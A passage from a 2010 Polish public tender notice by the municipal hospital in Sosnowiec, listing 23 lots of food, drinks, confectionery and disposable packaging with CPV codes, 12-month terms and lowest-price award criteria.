<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 10:00, miejsce: SP Szpital Miejski w Sosnowcu, 41-219 Sosnowiec, 
ul. Szpitalna 1, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Opakowania jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	             Flaczarka biała 500 ml
2		Kubek przezroczysty 200ml
3		Talerz niedzielony
4		Łyżka duża biała
5		Łyżeczka biała
6		Tacki tekturowe 140x200 op. 500 szt.
7		Reklamówki HDPE 8 op.200 szt. (27/7/48)
8		Folia spożywcza 250m/szt.
9		Reklamówka HDPE na rolce -5- 24x6x44 op. 200szt.
10		Reklamówka kolorowa 40x45 cm
11		Serwetki gastronomiczne 15x15 a 500
12		Foremka aluminiowa 500ml
13		Foremka aluminiowa 250ml
14		Pojemnik zamykany 240x173x33
15		Pojemnik zamykany 268x211x32
16		Nóż
17		Widelec
18		Mieszadełko
19		Koperta frytki 100g (op. 200 szt.)
20		Koperta frytki 200g (op. 200 szt.)
21		Koperta hamburger mała (op. 200 szt.)
22		Koperta hot-dog (op. 200 szt.)
23		Woreczki 18/4/35 op.1000
24		Woreczki 14/4/26 op.1000
25		Woreczki 10/4/27 op.1000
26		Woreczki 14/4/35 op.1000
27		Kubek 250ml styropianowy
28		Filiżanka brązowa-biała 200ml
29		Menu box niedzielony
30		Tacki tekturowe 140x250 op. 500 szt.
31		Papier do pieczenia 5kg
32		Serwetki ażurowe 32 cm (op. 100 szt.)
33		Serwetki ażurowe 40x20 cm (op. 100 szt.)
34		Folia aluminiowa ~150 m
35		Rurki kolorowe - słomki (op. 1000 szt.)
36		Widelczyk do frytek
37		Koperta hamburger duża 200 szt.
38		Papier do pakowania ryza 40/60 (10 kg)
39		Rolka do kasy fiskalnej termoczuła 28mm/30m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Galanteria mleczarska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ser podpuszczkowy twardy (żółty) porcjowany pak. Folia ~ 150g
2	Serek topiony ~ 17,5g
3	Serek topiony tylżycki ~ 100g
4	Serek topiony z borowików ~100g
5	Serek topiony szynka ~100g
6	Serek topiony słonecznik ~100g
7	Serek topiony szczypiorek ~100g
8	Serek topiony Złoty Ement. ~100g
9	Serek topiony warzywa ~ 100g 
10	Serek topiony Hochland ~200g
11	Serek kanapkowy śmiet. ~150g
12	Masło Lurpak ~10g
13	Masło Lactime ~ 10g
14	Masło Górskie  ~100g
15	Serek homogenizowany naturalny półtłusty pak. ~ 150g
16	Serek homogenizowany owocowy półtłusty pak. ~150g
17	Serek Jogobella ~150g
18	Homo Danio serek ~140g
19		Krem Fantazja owoc. kącik ~150g
20		Homo Wanilia serek ~150g
21		Serek Bieluch ~150g
22		Serek do chleba  ~100g:        szczypiorkowy, ziołowy, naturalny            
23		Serek wiejski  ~200g  
24		Śmietanka do kawy Łowicz ~10g 
25		Mleko zagęszczone niesłodzone GOSTYŃ ~200g
26		Mleko zagęszczone niesłodzone ~350g
27		Mleko Łaciate UHT 2% 0.5 l 
28		Mleko Łaciate UHT 3,2% 0.5 l
29		Mleko Łaciate UHT 2% 1 l
30		Mleko Łaciate UHT 3,2% 1 l
31		Kefir ~250g 2% Luks.
32		Kefir ~400g 2% Luks.
33		Jogurt naturalny b/c ~200g
34		Jogurt naturalny ~400g 
35		Jogobella jogurt owocowy ~150g 
36		Jogurt z musli ~180g 
37		Maślanka naturalna KRASNYSTAW ~400g
38		Maślanka owocowa KRASNYSTAW ~400g
39		Jogurt Jogobella zboża ~180g
40		Jogurt Jogobella do picia ~330g
41		Jogurt Actimel ~100g
42		Jogurt Activia ~115g
43		Jogurt Danon Aksamitny ~370g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Galanteria mleczarska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ser podpuszczkowy twardy (żółty) tłusty typu Gouda
2	Serek topiony porcjowany ~17,5g
3	Serek homogenizowany naturalny półtłusty pak. ~125g
4	Serek homogenizowany owocowy półtłusty pak. ~125g
5	Kefir 2% Luks. ~200g
6	Jogurt naturalny b/c ~200g
7	Jogurt owocowy b/c ~200g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Melko, ser twarogowy, śmietana, masło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Mleko spożywcze 2% luz
2		Śmietana spożywcza 18% luz
3		Ser twarogowy półtłusty
4		Masło extra zaw. Tłuszczu 82% paczk. 200g
5		Masło roślinne pakowane kubek 500g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.51.10.00-3, 15.51.20.00-0, 15.54.21.00-0, 15.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - wyroby mrożone - lody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lody różne smaki ~ 90 ml typu: Koral, Zielona Budka, Algida i inne
2	Lody różne smaki ~ 110 ml typu: Koral, Zielona Budka, Algida i inne
3	Lody różne smaki ~ 220 ml typu: Koral, Zielona Budka, Algida i inne
4	Lody różne smaki ~ 300 ml typu: Koral, Zielona Budka, Algida i inne
5	Torty i Rolady lodowe ~1000 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.55.51.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - soki owocowe,warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	2	Fortuna Nektar różne smaki 1L
2	3	Fortuna Sok różne smaki  1 l
3	4	Fortuna Sok Jabłkowy  1 l
4	5	Kubuś sok różne smaki  ~0,33 l
5		Tarczyn Sok różne smaki 0,3 l
6		Tymbark Pomid.   1 l
7		Tymbark Owal Sok różne smaki  0,25 l
8		Sok Dr Witt różne smaki 0,3 l
9		Sok Dr Witt-owocowy różne smaki 1 l
10		Sok Dr Witt Multiwit. Ziel. 1 l
11		Soki warzywne różne smaki 1L
12		Kubuś Sok różne smaki  1 l
13		Hortex napoje różne smaki  1 l
14		Hortex Sok różne smaki  1  l
15		Hortex Nektar różne smaki 1 l
16		Hortex Sok różne smaki 0,25 l
17		Tymbark Napój różne smaki 1l
18		Tymbark Napój różne smaki 0,5l
19		Tymbark Napój różne smaki 0,25l
20		Hortex Light różne smaki  1 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - soki warzywne - naturalne jednodniowe, sałatki, surówki krótkotrwałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	2	Sok marchwiowy  ~0,2 l
2	3	Sok marchwiowy  ~0,48l
3	4	Soki wielowarzywne ~0,2l 
4	5	Surówki standard ze świeżych warzyw  ~350g
5		Surówki standard ze świeżych warzyw  ~300g
6		Surówki standard ze świeżych warzyw  ~180g
7		Sałatka warzywna w zestawie z sosem ~280g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - owoce świeże krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Jabłka
2		Truskawka
3		Śliwka węgierka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3, 02.22.23.21-9, 03.22.23.13-0, 03.22.23.34-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - owoce południowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Cytryna
2		Mandarynka
3		Pomarańcze
4		Banan
5		Winogrona białe
6		Winogrona czerwone
7		Kiwi
8		Brzoskwinie
9		Grapefruit czerwone
10		Grapefruit biały
11		Grapefruit zielony
12		Morela
13		Nektaryny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10  - chrupki, chipsy, orzeszki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Chrupki kukurydziane ~80g
2		Flipsy różne smaki ~ 80g
3		Flipsy różne smaki ~50-60g
4		Chips różne smaki ~22g
5		Chipsy różne smaki ~50g
6		Orzeszki solone ~100g 
7		Orzechy ziemne puszka 150g
8		Orzeszki ~40g 
9		Orzeszki ziemne ~100g różne smaki
10		Mieszanka studencka 200g
11		Pistacje 100g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.31.23.00-1, 15.89.44.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - zupy w proszku, produkty instant.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		KNORR Gorący Kubek barszcz czerwony 12g
2		KNORR Gorący Kubek 16÷18g różne smaki (pieczarkowa, pomidorowa, grochowa itp.)
3		Knorr Nudle 64g
4		Zupy typu chińskie 60÷70g różne smaki
5		Makarony z sosem różne smaki min. 52g
6		Puree ziemniaczane z dodatkami min. 57g
7		Kisiel, budyń błyskawiczny ~30g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - słodycze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czekolada mleczna 100g  Wedel
2           Czekolada gorzka Wedel 100g
3	Czekolada bakaliowa Wedel 100g
4	Czekolada z nadz. róż. Wedel 100g
5	Czekolada różne smaki Wedel 180g
6	Czekolada różne smaki Wedel 300g
7	Czekolada Goplana różne smaki 100g
8	Wawel Czekolada light 80g
9	Czekolada Milka 100g różne smaki
10	Czekolada Milka 300g
11	Czekolada mleczna Alpen 100g różne smaki
12	Czekolada Alpen z okienkiem 100g
13	Czekolada Alpen biała, gorzka 100g
14	Czekolada Alpen 200g 
15	Czekolada Terravita 100g
16	Czekolada Terravita 250g 
17	Lizaki wielosmak. kulka  
18	Lizaki Chupa-chups mały
19	Draże różne smaki 70g
20		Draże w czekoladzie 100g
21		Halls różne smaki 33,5g
22		Baton czekoladowy Maciek 40g różne smaki
23		Baton 3 Bit 43g
24		Baton 3 Bit XXL 53g
25		Baton Bounty 57g
26		Baton czekoladowy Mars 42g 
27		Baton typu Pierrot, Batony nadziewane różne smaki ~ 35 ÷ 50g
28		Baton czekoladowy Kit-Kat 46g
29		Baton Milky Way 21,5g 
30		Baton Milky Way 36g 
31		Baton WW 
32		Baton Pawełek 45÷56g
33		Lion 41÷46g
34		Twix 51g
35		Grześki n/oblewane 28g
36		Grześki w czekoladzie ~39g
37		Grześki 20g w czekoladzie
38		Princessa ~37g różne smaki
39		Princessa Maxi 49g
40		Prince Polo XXL 52g
41		Prince Polo Cl. ~39g
42		Prince Polo Clasic 20g
43		Chałwa różne smaki 20g
44		Chałwa różne smaki 50g
45		Chałwa różne smaki 100g
46		Chałwa w czekoladzie 60g
47		Skittles 45g
48		Snickers ~51g
49		Snickers Crun 40g
50		Snickers Super 75g
51		Tic-Tak różne smaki 12÷16g
52		Mentos różne smaki 38g
53		Guma Mentos b/c 13g
54		Guma Mamba 27,5g
55		Guma Winterfresh różne smaki drażetki
56		Guma Orbit różne smaki listki a 5
57		Nimm 2 Śmiejżelki 100g
58		Nimm 2 dropsy 50g
59		Nimm 2 torebki 90g
60		Ice Fresh dropsy 50g
61		Ice Fresh torebki 125g
62		Kopiko torebki 120g
63		Kopiko dropsy 40g
64		Kopiko torba 800g
65		Żelki różne ~90g
66		Jajko Kinder Niespodzianka
67		Kinder Chocolate T 8
68		Kinder Chocolate T 4
69		Kinder Bueno
70		Raffaello 30g
71	71	Raffaello T 15
72	72	Raffaello T 24
73	73	Raffaello 240 Kufer
74	74	Ferrero Rocher 37,5g
75	75	Ferrero Rocher 300÷312g
76	76	Ferrero Rocher 312g Piramidka, Serce
77	77	Merci 250g
78	78	Merci 400g
79		Toffifee 125g
80		Toffifee 400g
81		Bomboniery Kujawianka, Mieszko ~220g
82		Bomboniery Kujawianka, Mieszko ~290÷360g
83		Bomboniera Czekoladowe Kreacje mix Solidarność 245g
84		Bomboniery Solidarność ~324g
85		Bomboniera Milka 150g
86		Baryłki Wedel 200g
87		Bomb. Pasjonata Wedel różne smaki 299g
88		Ptasie Mleczko Wedel 450g
89		Alpejskie Mleczko 400g
90		Ptasie Mleczko ~ 400g
91		Wiśnie w czekol. ~197g
92		Adwokatki 300g
93		Adwokatki 180g
94		Bomboniery świąteczne 120÷180g
95		Cukierki Kukułki luz.
96		Cuk. Musujące typ. Zozole mix
97		Cuk. Mieszanka owocowa luz.
98		Mieszanka Wedlowska igraszki luz.
99		Śliwka w czek., Kasztanki, Złote praliny
100		Wiśnie w czekoladzie luz.
101		Adwokatki luz.
102		Czekoladki  luz. Mieszanka typu Marsy, Bounty
103		Toffee mleczne, śmiet., kaw. luz.
104		Galaretka w czekoladzie luz.
105		Galaretka pałka w czekol. luz.
106		Galaretka blok w cukrze luz.
107		Ptasie mleczko w czekol. luz.
108		Trufle w polewie zawij. luz.
109		Michałki z Hanki w czek. zawij. luz.
110		Krówka polska mleczna luz.
111		Mieszanka krakowska luz.
112		Mleczko otmuchowskie luz.
113		Landyryny owoc. pacz. 90g
114		Landyryny mięt. pacz. 90g
115		Ice cool pacz. 100g
116		Ice mint pacz. 100g
117		Karmelki light różne smaki ~80g
118		Kukułki paczkow. 120g
119		Cuk. paczkow. zawij. 100g różne smaki
120		Karmelki różne smaki ~80g
121		Kamyki brzeskie 100g
122		M&M 48g
123		Ciastka Pieguski 135g
124		Delicje różne smaki ~147g
125		Paluszki beskidzkie słone, z makiem, z sezamem 70g
126		Paluszki Lajkonik 70g
127		Paluszki Lajkonik 180g
128		Krakersy  70g
129		Krakersy 180g
130		Sucharki bieszczadzkie 90g
131		Biszkopty ~140g
132		Herbatniki szkolne ~70g
133		Herbatniki Be-Be ~16g
134		Ciastka maślane ~160g
135		Herbatniki Leibnitz 50g
136		Herbatniki Leibnitz 100g
137		Ciastka Petitki 126g
138		Ciastka Petitki 48g
139		Ciastka Petitki biszkopty 120g
140		Ciastka Petitki zboża 300g
141		Markizy 250g
142		Jeżyki 140g
143		Wafle Familijne 150g
144		Wafle śmietankowe, kokosowe, kakaowe ~180g
145		Wafle light 80g
146		Ciastka deser. różne ~170g
147		Ciastka b/c 125g
148		Pierniki alpejskie 160g
149		Pierniki nadziewane ~165g
150		Precelki 150g
151		Sezamki ciastka 30g
152		Wafle śmietankowe luz.
153		Ciastka w czekoladzie luz.
154		Pierniki lukrowane luz.
155		Ciastka kruche luz
156		Ciastka kruche obl. czekol.
157		Ciastka karpatka luz.
158		Talarki krakowskie 170g
159		Ciastka Petitki 85g
160		Rogal 7 Days 65g
161		Rogal 7 Days 85g
162		Ciastka dekorowane.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-6, 15.84.23.00-5, 15.84.20.00-2, 15.81.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - kawa naturalna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Kawa Tchibo Family 100g
2		Kawa Tchibo Family 250g
3		Kawa Tchibo rozp. 50g
4		Kawa Tchibo Mild miel. 250g
5		Kawa Tchibo Exclus. Miel. 100g
6		Kawa Tchibo Exclus. Miel. 250g
7		Nescafe Gold rozp. 100g
8		 Nescafe Cl. Rozp. 50g
9		Nescafe Cl. Rozp. 100g
10		Nescafe Cl. Rozp. 200g
11		Nescafe Cl. Pal. 2g a 100szt.
12		Nescafe 2W1 10g
13		Nescafe 3W1 18g
14		Mokate Cappucino 15g
15		Nescafe Gold rozp. 200g
16		La Festa Czekolada rozp. 14g
17		Kawa Tchibo Mild miel. 100g
18		Jacobs Kronung 250g
19		Jacobs Kronung 100g
20		Jacobs Kronung rozp. 50g
21		Jacobs Kronung rozp. 100g
22		Jacobs Kronung rozp. 200g
23		Jacobs Aroma rozp. 100g
24		Jacobs Cronat Gold 100g
25		Jacobs Cronat Gold 250g
26		Jacobs Cronat Gold 500g
27		Jacobs Cronat Gold rozp. 50g
28		Jacobs Cronat Gold rozp. 100g
29		Jacobs Cronat Gold rozp. 200g
30		Kawa Maxwell House twarda 250g
31		Kawa Maxwell House 100g
32		Maxwell House rozp. 50g
33		Maxwell House rozp. 100g
34		Maxwell House rozp. 200g
35		Kawa miel.typu Woseba 100g
36		Kawa miel.typu Woseba 250g
37		Nescafe Gold 2g (op.100szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Sól warzona biała
2		Pieprz prawdziwy czarny mielony
3		Kwasek cytrynowy
4		Ziele angielskie
5		Majeranek
6		Liść laurowy
7		Kminek
8		Czosnek granulowany
9		Papryka słodka mielona
10		Delikat przyprawa do mięsa
11		Przyprawa do ryb
12		Delikat przyprawa do drobiu ~25g
13		Przyprawa do bigosu ~20g
14		Przyprawa do potraw Kucharek
15		Przyprawa w płynie opak. 1 ÷ 5 l
16		Ocet spirytusowy 6% - 10% 0,5 l but.
17		Przyprawa do flaków 20g
18		Przyprawa do fasoli 20g
19		Sos do sałatek KNORR 9g
20		Żelatyna spożywcza opak. 50g
21		Przyprawa do piekarnika opak. 40g
22		Soda oczyszczona opak. 50g
23		Przyprawa Gros ~30g
24		Cynamon ~20g
25		Goździki opak. 10g
26		Koper suszony 25g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15 - artykuły sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Mąka ziemniaczana
2		Cukier
3		Cukier puder
4		Herbata granulowana
5		Kawa zbożowa
6		Kleik ryżowy opak. 175÷230g
7		Kaszka mleczno-ryżowa opak. 230÷250g
8		Kaszka bezmleczna owocowa opak. 230÷250g
9		Budyń bez cukru ~41g
10		Galaretka owocowa ~80g
11		Kisiel bez cukru opak. ~ 45g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-5, 15.61.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16 - przyprawy do ciast.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Proszek do pieczenia 32g
2		Cukier waniliowy 32g
3		Śmietan fix  9g
4		Kakao  100g
5		Czekolada mleczna 100g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.90.00-6, 15.84.21.00-3, 15.84.10.00-5, 15.61.24.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17 - tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Margaryna mleczna w blokach
2		Olej uniwersalny luz
3		Margaryna Palma op. 250g
4		Olej sojowy luz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.41.22.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18 - herbata.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Herbata expresowa  Lipton Yellow op. 100 torebek x 2g
2		Herbata expresowa  Lipton  op. 25 torebek 
3		Lipton owocowe exp. 20 torebek
4		Lipton exp. piramidki
5		Lipton Mix exp. 25 kopert
6		Brooke Bond exp. 20 torebek
7		Saga exp. 20 torebek
8		Saga owoc. Exp. 20 torebek
9		Herbaty exp. typu Dilmah  25 torebek
10		Herbata exp. 20 torebek typu Minutka, Posti
11		Herbata czarna exp. 20 torebek
12		Herbata owoc. Vitax exp. 5 torebek
13		Herbata  Pu-erh 25 torebek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19 - żurek w płynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Żurek w płynie opak. 0,5L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20 - jaja spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja spożywcze średnie (55-60g) kl. I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Aronia mrożona
2		Truskawka mrożona
3		Brokuły mrożone
4		Szpinak rozdrobniony mrożony
5		Fasolka szparagowa mrożona
6		Brukselka mrożona
7		Marchewka mrożona kostka
8		Groszek zielony mrożony
9		Papryka czerwona mrożona
10		Mieszanka kompotowa
11		Włoszczyzna 3 - składnikowa paski mrożona: marchew, pietruszka, seler
12		Mieszanka warzywna  5 - składnikowa mrożona
13		Frytka mr. op. 2,5kg
14		Flaki mr. Blanszowane op. 900g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22 - ryby, przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Filet z ryby - morszczuk mrożony SHP kl. I
2		Karp żywy (polski)
3		Śledzie solone Matias 5kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23 - wyroby garmażeryjne gotowe mrożone i dodatki garmażeryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Placek ziemniaczany po węgiersku mr.
2		Szaszłyk wieprzowy mr.
3		Golonko delikatesowe mr.
4		Stek wieprzowy mr.
5		Szaszłyk drobiowy mr.
6		Galareta drobiowa ~150g
7		Galareta wieprzowa ~150g
8		Żeberka wieprzowe mr.
9		Sos do hamburgerów 1l
10		Sos do hamburgerów 0,3l
11		Flaki woł. ~350g
12		Pierogi różne smaki ~300g
13		Cukier saszetka 5g
14		Sól saszetka 1,5g
15		Ketchup 500g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.42.00-3, 15.87.24.00-5, 15.83.10.00-2, 15.87.12.60-4, 15.87.12.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
